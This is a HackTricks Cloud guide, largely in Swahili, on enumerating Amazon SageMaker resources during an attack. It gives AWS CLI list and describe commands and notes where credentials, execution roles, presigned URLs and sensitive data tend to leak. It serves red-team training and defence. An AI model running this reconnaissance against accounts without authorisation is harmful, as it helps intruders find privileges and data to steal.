HackTricks CloudAWS - SageMaker Enum
Reading time: 8 minutes
tip
Jifunze na fanya mazoezi ya AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: 
HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na fanya mazoezi ya Azure Hacking: 
HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
- Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.
Muhtasari wa Huduma
Amazon SageMaker ni jukwaa la kujifunza kwa mashine linalosimamiwa la AWS linalounganisha notebooks, miundombinu ya mafunzo, orchestration, registries, na managed endpoints. Kukomolewa kwa rasilimali za SageMaker kwa kawaida kunatoa:
- IAM execution roles za muda mrefu zenye upatikanaji mpana wa S3, ECR, Secrets Manager, au KMS.
- Upatikanaji wa datasets nyeti zilizo hifadhiwa katika S3, EFS, au ndani ya feature stores.
- Misingi ya mtandao ndani ya VPCs (Studio apps, training jobs, endpoints).
- High-privilege presigned URLs that bypass console authentication.
Kuelewa jinsi SageMaker inavyojengwa ni muhimu kabla ya ku-pivot, ku-persist, au ku-exfiltrate data.
Vipengele vya Msingi
- Studio Domains & Spaces: Web IDE (JupyterLab, Code Editor, RStudio). Kila domain ina shared EFS file system na default execution role.
- Notebook Instances: Managed EC2 instances kwa notebooks za pekee; hutumia execution roles tofauti.
- Training / Processing / Transform Jobs: Containers za muda mfupi ambazo zinavuta code kutoka ECR na data kutoka S3.
- Pipelines & Experiments: Orchestrated workflows ambazo zinaeleza hatua zote, inputs, na outputs.
- Models & Endpoints: Packaged artefacts zinazowekwa kwa ajili ya inference kupitia HTTPS endpoints.
- Feature Store & Data Wrangler: Managed services kwa maandalizi ya data na usimamizi wa features.
- Autopilot & JumpStart: Automated ML na katalogi ya modeli zilizochaguliwa.
- MLflow Tracking Servers: Managed MLflow UI/API yenye presigned access tokens.
Kila rasilimali inarejelea execution role, S3 locations, container images, na mpangilio wa hiari wa VPC/KMS—chukua zote wakati wa enumeration.
Akaunti & Metadata ya Ulimwengu
bash
REGION=us-east-1
# Portfolio status, used when provisioning Studio resources
aws sagemaker get-sagemaker-servicecatalog-portfolio-status --region $REGION
# List execution roles used by models (extend to other resources as needed)
aws sagemaker list-models --region $REGION --query 'Models[].ExecutionRoleArn' --output text | tr ' ' '
' | sort -u
# Generic tag sweep across any SageMaker ARN you know
aws sagemaker list-tags --resource-arn <sagemaker-arn> --region $REGION
Tambua uaminifu wowote kati ya akaunti (cross-account trust) (execution roles au S3 buckets zenye external principals) na vikwazo vya msingi kama service control policies au SCPs.
Domeni za Studio, Programu na Nafasi za Kushirikiwa
bash
aws sagemaker list-domains --region $REGION
aws sagemaker describe-domain --domain-id <domain-id> --region $REGION
aws sagemaker list-user-profiles --domain-id-equals <domain-id> --region $REGION
aws sagemaker describe-user-profile --domain-id <domain-id> --user-profile-name <profile> --region $REGION
# Enumerate apps (JupyterServer, KernelGateway, RStudioServerPro, CodeEditor, Canvas, etc.)
aws sagemaker list-apps --domain-id-equals <domain-id> --region $REGION
aws sagemaker describe-app --domain-id <domain-id> --user-profile-name <profile> --app-type JupyterServer --app-name default --region $REGION
# Shared collaborative spaces
aws sagemaker list-spaces --domain-id-equals <domain-id> --region $REGION
aws sagemaker describe-space --domain-id <domain-id> --space-name <space> --region $REGION
# Studio lifecycle configurations (shell scripts at start/stop)
aws sagemaker list-studio-lifecycle-configs --region $REGION
aws sagemaker describe-studio-lifecycle-config --studio-lifecycle-config-name <name> --region $REGION
Nini cha kurekodi:
DomainArn,AppSecurityGroupIds,SubnetIds,DefaultUserSettings.ExecutionRole.- EFS iliyounganishwa (
HomeEfsFileSystemId) na direktori za nyumbani za S3. - Scripts za lifecycle (mara nyingi zinabeba bootstrap credentials au push/pull extra code).
tip
Presigned Studio URLs zinaweza kupitisha uthibitishaji ikiwa zimetolewa kwa upana.
Mifano ya Notebook na Mipangilio ya Lifecycle
bash
aws sagemaker list-notebook-instances --region $REGION
aws sagemaker describe-notebook-instance --notebook-instance-name <name> --region $REGION
aws sagemaker list-notebook-instance-lifecycle-configs --region $REGION
aws sagemaker describe-notebook-instance-lifecycle-config --notebook-instance-lifecycle-config-name <cfg> --region $REGION
Metadata ya notebook inafichua:
- Jukumu la utekelezaji (
RoleArn), ufikaji wa moja kwa moja wa intaneti dhidi ya hali ya VPC-only. - Maeneo ya S3 katika
DefaultCodeRepository,DirectInternetAccess,RootAccess. - Scripti za lifecycle kwa credentials au persistence hooks.
Mafunzo, Usindikaji, Transform na Kazi za Batch
bash
aws sagemaker list-training-jobs --region $REGION
aws sagemaker describe-training-job --training-job-name <job> --region $REGION
aws sagemaker list-processing-jobs --region $REGION
aws sagemaker describe-processing-job --processing-job-name <job> --region $REGION
aws sagemaker list-transform-jobs --region $REGION
aws sagemaker describe-transform-job --transform-job-name <job> --region $REGION
AlgorithmSpecification.TrainingImage/AppSpecification.ImageUri– ni ECR images gani zimewekwa.InputDataConfig&OutputDataConfig– S3 buckets, prefixes, na KMS keys.ResourceConfig.VolumeKmsKeyId,VpcConfig,EnableNetworkIsolation– kubaini msimamo wa mtandao au usimbaji.HyperParameterszinaweza leak siri za mazingira au connection strings.
Pipelines, Experiments & Trials
bash
aws sagemaker list-pipelines --region $REGION
aws sagemaker list-pipeline-executions --pipeline-name <pipeline> --region $REGION
aws sagemaker describe-pipeline --pipeline-name <pipeline> --region $REGION
aws sagemaker list-experiments --region $REGION
aws sagemaker list-trials --experiment-name <experiment> --region $REGION
aws sagemaker list-trial-components --trial-name <trial> --region $REGION
Maelezo ya pipeline yanaelezea kila hatua, majukumu yanayohusiana, container images, na environment variables. Vipengele vya jaribio mara nyingi vinajumuisha URIs za artefakti za mafunzo, S3 logs, na metriksi zinazoonyesha mtiririko wa data nyeti.
Modeli, Usanidi wa Endpoint & Endpoints Zilizowekwa
bash
aws sagemaker list-models --region $REGION
aws sagemaker describe-model --model-name <name> --region $REGION
aws sagemaker list-endpoint-configs --region $REGION
aws sagemaker describe-endpoint-config --endpoint-config-name <cfg> --region $REGION
aws sagemaker list-endpoints --region $REGION
aws sagemaker describe-endpoint --endpoint-name <endpoint> --region $REGION
Focus areas:
- URI za S3 za artefakti za modeli (
PrimaryContainer.ModelDataUrl) na image za inference container. - Mipangilio ya kukamata data ya Endpoint (S3 bucket, KMS) kwa ajili ya uwezekano wa log exfil.
- Multi-model endpoints zinazotumia
S3DataSourceauModelPackage(angalia cross-account packaging). - Mipangilio ya network na security groups zilizounganishwa na endpoints.
Feature Store, Data Wrangler & Clarify
bash
aws sagemaker list-feature-groups --region $REGION
aws sagemaker describe-feature-group --feature-group-name <feature-group> --region $REGION
aws sagemaker list-data-wrangler-flows --region $REGION
aws sagemaker describe-data-wrangler-flow --flow-name <flow> --region $REGION
aws sagemaker list-model-quality-job-definitions --region $REGION
aws sagemaker list-model-monitoring-schedule --region $REGION
Vidokezo vya usalama:
- Feature stores za mtandaoni huiga data kwenda Kinesis; angalia
OnlineStoreConfig.SecurityConfig.KmsKeyIdna VPC. - Data Wrangler flows mara nyingi huweka JDBC/Redshift credentials au private endpoints.
- Clarify/Model Monitor jobs hutoa data kwa S3 ambayo inaweza kuwa inasomwa na wote (world-readable) au kupatikana kwa akaunti nyingine (cross-account accessible).
Seva za Tracking za MLflow, Autopilot & JumpStart
bash
aws sagemaker list-mlflow-tracking-servers --region $REGION
aws sagemaker describe-mlflow-tracking-server --tracking-server-name <name> --region $REGION
aws sagemaker list-auto-ml-jobs --region $REGION
aws sagemaker describe-auto-ml-job --auto-ml-job-name <name> --region $REGION
aws sagemaker list-jumpstart-models --region $REGION
aws sagemaker list-jumpstart-script-resources --region $REGION
- Server za MLflow tracking huhifadhi majaribio na artefakti; presigned URLs zinaweza kufichua kila kitu.
- Autopilot jobs huendesha training jobs nyingi—orodhesha matokeo ili kutafuta data iliyofichwa.
- JumpStart reference architectures zinaweza kupeleka privileged roles ndani ya akaunti.
IAM & Mambo ya Mtandao
- Orodhesha IAM policies zilizounganishwa na roles zote za utekelezaji (Studio, notebooks, training jobs, pipelines, endpoints).
- Angalia muktadha wa mtandao: subnets, security groups, VPC endpoints. Mashirika mengi huwaweka training jobs kando lakini husahau kuzuia trafiki inayotoka nje.
- Pitia S3 bucket policies zinazotajwa katika
ModelDataUrl,DataCaptureConfig,InputDataConfigkwa ajili ya ufikiaji wa nje.
Privilege Escalation
Persistence
Post-Exploitation
AWS - SageMaker Post-Exploitation
Unauthorized Access
AWS - SageMaker Unauthenticated Enum
Marejeo
- AWS SageMaker Documentation
- AWS CLI SageMaker Reference
- SageMaker Studio Architecture
- SageMaker Security Best Practices
tip
Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
- Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.